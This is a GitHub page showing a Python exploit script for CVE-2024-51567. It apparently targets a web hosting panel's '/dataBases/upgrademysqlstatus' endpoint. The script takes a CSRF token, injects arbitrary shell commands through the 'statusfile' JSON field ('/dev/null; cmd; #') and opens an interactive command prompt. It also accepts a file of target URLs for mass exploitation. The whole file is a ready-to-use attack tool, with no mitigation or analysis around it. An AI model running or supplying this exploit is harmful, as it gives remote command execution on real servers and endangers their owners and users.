-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-51567.py
70 lines (56 loc) · 3.33 KB
/
CVE-2024-51567.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import httpx
import sys
import os
def display_banner():
banner = """
██████╗ ██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ███████╗ ██╗███████╗ ██████╗ ███████╗
██╔════╝ ██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝███║██╔════╝██╔════╝ ╚════██║
██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║████╗███████╗╚██║███████╗███████╗ ██╔╝
██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚═══╝╚════██║ ██║╚════██║██╔═══██╗ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████║ ██║███████║╚██████╔╝ ██║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝╚══════╝ ╚═════╝ ╚═╝
github/ajayalf
"""
print(banner)
def get_CSRF_token(client):
resp = client.get("/")
print("Cookies received:", resp.cookies)
if 'csrftoken' in resp.cookies:
return resp.cookies['csrftoken']
else:
print("Error: CSRF token not found in cookies.")
sys.exit(1)
def pwn(client, CSRF_token, cmd):
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json().get("requestStatus", "Error")
def exploit(client, cmd):
CSRF_token = get_CSRF_token(client)
stdout = pwn(client, CSRF_token, cmd)
print(stdout)
def run_exploit(target):
client = httpx.Client(base_url=target, verify=False)
while True:
cmd = input("$> ")
if cmd.lower() in ["exit", "quit"]:
print("Exiting...")
break
exploit(client, cmd)
if __name__ == "__main__":
display_banner()
if len(sys.argv) < 2:
print("Usage: python CVE-2024-51567.py <target-url> or python CVE-2024-51567.py <target.txt>")
sys.exit(1)
target_arg = sys.argv[1]
if os.path.isfile(target_arg):
with open(target_arg, "r") as file:
targets = [line.strip() for line in file if line.strip()]
for target in targets:
print(f"\nExploiting target: {target}")
run_exploit(target)
else:
run_exploit(target_arg)